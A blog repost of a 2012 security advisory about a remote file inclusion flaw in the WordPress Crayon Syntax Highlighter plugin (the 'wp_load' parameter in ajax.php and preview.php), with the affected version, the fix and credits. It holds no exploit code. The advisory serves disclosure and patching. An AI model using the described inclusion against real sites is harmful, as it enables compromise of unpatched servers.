WordPress Crayon Syntax Highlighter Plugin “wp_load” Remote File Inclusion Vulnerability

Charlie Eriksen has discovered a vulnerability in the Crayon Syntax Highlighter plugin for WordPress, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the “wp_load” parameter in wp-content/plugins/crayon-syntax-hightlighter/util/ajax.php and wp-content/plugins/crayon-syntax-hightlighter/util/preview.php is not properly verified before being used to include files. This can be exploited to include arbitrary PHP files from external FTP resources.

The vulnerability is confirmed in version Crayon Syntax Highlighter Plugin version 1.12.1. Prior versions may also be affected.

wp_load Remote File Inclusion Vulnerability solution #

Update to version 1.13.

Provided and/or discovered by #

Charlie Eriksen via Secunia

Original Advisory #

Charlie:
http://ceriksen.com/2012/10/15/wordpress-crayon-syntax-highlighter-remote-file-inclusion-vulnerability/ (fixed link, which is broken in the Secunia advisory)

Secunia Advisory #

http://secunia.com/advisories/50804/


Show your support


If you want to step in to help me cover the costs for running this website, that would be awesome. Just use this link to donate a cup of coffee ($5 USD for example). And please share the love and help others make use of this website. Thank you very much!


About the Author Jan Reilink

My name is Jan. I am not a hacker, coder, developer, programmer or guru. I am merely a system administrator, doing my daily thing at Vevida in the Netherlands. With over 15 years of experience, my specialties include Windows Server, IIS, Linux (CentOS, Debian), security, PHP, websites & optimization.

follow me on:

Leave a Reply

Be the First to Comment!

avatar
  Subscribe  
Notify of